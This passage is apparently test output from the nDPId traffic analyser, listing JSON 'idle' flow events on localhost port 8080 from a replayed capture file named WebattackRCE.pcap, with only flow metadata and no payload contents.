00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7580000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7580000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7580000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7580000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7580000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
